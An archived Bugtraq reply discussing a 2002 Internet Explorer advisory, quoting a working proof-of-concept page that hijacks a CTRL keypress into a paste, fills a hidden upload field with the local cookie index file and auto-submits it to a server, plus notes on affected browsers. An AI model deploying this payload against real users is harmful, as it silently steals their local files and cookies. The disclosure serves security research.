Bugtraq mailing list archives

Re: Pressing CTRL in IE is dangerous - Sandblad advisory #8


From: Peter Pentchev <roam () ringlet net>
Date: Wed, 24 Jul 2002 11:42:01 +0300

On Tue, Jul 23, 2002 at 09:50:30PM +0200, Andreas Sandblad wrote:

                  - Sandblad advisory #8 -

---..---..---..---..---..---..---..---..---..---..---..---..----
Title:      Pressing CTRL in IE is dangerous
Date:       [2002-07-23]
Software:   Internet Explorer
Impact:     Pressing CTRL in IE may result in an arbitrary local
            file being uploaded to a remote server (no exact
            path needed). If specially sensitive information is
            uploaded, it may be used to run remote programs.
[snip]
1. When a user presses the CTRL key an onkeydown event can be set to
fire. In the event function the key pressed is changed to 'V'. The result
will be a paste operation with fewer restrictions.

2. The content of the clipboard is altered and focus is changed to a
hidden file upload form. The paste operation will be performed into the
form, yielding a change of value for the file upload field (not normally
allowed).

3. The upload form is submitted automatically (legal javascript operation).
[snip]
<div id=h style="zoom:0.0001">
<form name=u enctype="multipart/form-data" method=post action=upload.php>
<input type=file name=file></form></div>
<script>
// Path of the local file to upload (relative, so no exact path is needed)
//uploadFile="..\\LOCALS~1\\TEMPOR~1\\CONTENT.IE5\\index.dat";
uploadFile="..\\Cookies\\index.dat";
function gotKey(){
  // Step 1: act only on a keydown with CTRL held, and only once
  if (!event.ctrlKey) return;
  document.onkeydown = null;
  // Rewrite the pressed key to 'V' (keyCode 86) so IE performs a paste
  event.keyCode = 86;
  // Step 2: put the path on the clipboard and focus the hidden file field
  window.clipboardData.setData("Text",uploadFile);
  (p=document.forms.u.file).focus();
  // Step 3: submit the form as soon as the paste changes the field value
  p.onpropertychange = function(){document.forms.u.submit()};
} document.onkeydown = gotKey;
// Give the body focus so the document receives the keydown event
window.onload=function(){document.body.focus()};
</script>

This was verified to work on various versions of IE 5 and 6, and also
on Opera 6.01 build 1041.  However, Mozilla 1.0rc1 is NOT vulnerable,
partly because of a script error (the onkeypress handler should accept
a parameter instead of referring to 'event' directly), and mostly because
of the fact that in Mozilla, event.keyCode is not settable.

G'luck,
Peter

-- 
Peter Pentchev  roam () ringlet net     roam () FreeBSD org
PGP key:        http://people.FreeBSD.org/~roam/roam.key.asc
Key fingerprint FDBA FD79 C26F 3C51 C95E  DF9E ED18 B68D 1619 4553
If you think this sentence is confusing, then change one pig.
